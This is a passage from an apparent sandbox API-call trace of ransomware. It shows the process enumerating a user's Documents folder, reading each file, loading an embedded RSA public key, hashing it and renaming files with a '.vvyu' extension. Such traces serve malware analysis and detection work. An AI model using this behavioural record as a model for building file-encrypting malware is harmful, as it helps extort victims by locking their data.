returned 1 [0193.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.293] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.294] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.294] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.294] CloseHandle (hObject=0x568) returned 1 [0193.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea0a68 [0193.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.296] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\4COwR1C7ya7.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\4cowr1c7ya7.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\4COwR1C7ya7.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\4cowr1c7ya7.pptx.vvyu")) returned 1 [0193.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.299] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc5f60, ftCreationTime.dwHighDateTime=0x1d8a3af, ftLastAccessTime.dwLowDateTime=0xfd1be6e0, ftLastAccessTime.dwHighDateTime=0x1d8a70c, ftLastWriteTime.dwLowDateTime=0xfd1be6e0, ftLastWriteTime.dwHighDateTime=0x1d8a70c, nFileSizeHigh=0x0, nFileSizeLow=0x18fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4l3gkybFjpw5wc.rtf", cAlternateFileName="4L3GKY~1.RTF")) returned 1 [0193.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e957b8 [0193.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e957b8 | out: hHeap=0x620000) returned 1 [0193.302] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\4l3gkybFjpw5wc.rtf") returned=".rtf" [0193.302] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\4l3gkybFjpw5wc.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\4l3gkybfjpw5wc.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.303] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=6397) returned 1 [0193.303] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.306] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x18d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.306] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.309] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.309] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x18fd, lpOverlapped=0x0) returned 1 [0193.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.310] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.311] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.311] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.311] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.311] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.311] GetLastError () returned 0x0 [0193.311] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.311] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.312] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.312] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.312] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1900) returned 0x2ea0a68 [0193.312] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e957b8 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95800 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.313] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea2370 [0193.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2370 | out: hHeap=0x620000) returned 1 [0193.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937e0 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c937c8 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.316] GetCurrentThreadId () returned 0x66c [0193.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ef00 [0193.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.317] GetCurrentThreadId () returned 0x66c [0193.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937e0 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93858 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937f8 [0193.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937c8 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea2370 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea2580 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea2798 [0193.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2580 | out: hHeap=0x620000) returned 1 [0193.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2798 | out: hHeap=0x620000) returned 1 [0193.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95800 | out: hHeap=0x620000) returned 1 [0193.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2370 | out: hHeap=0x620000) returned 1 [0193.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.329] HeapFree (in: 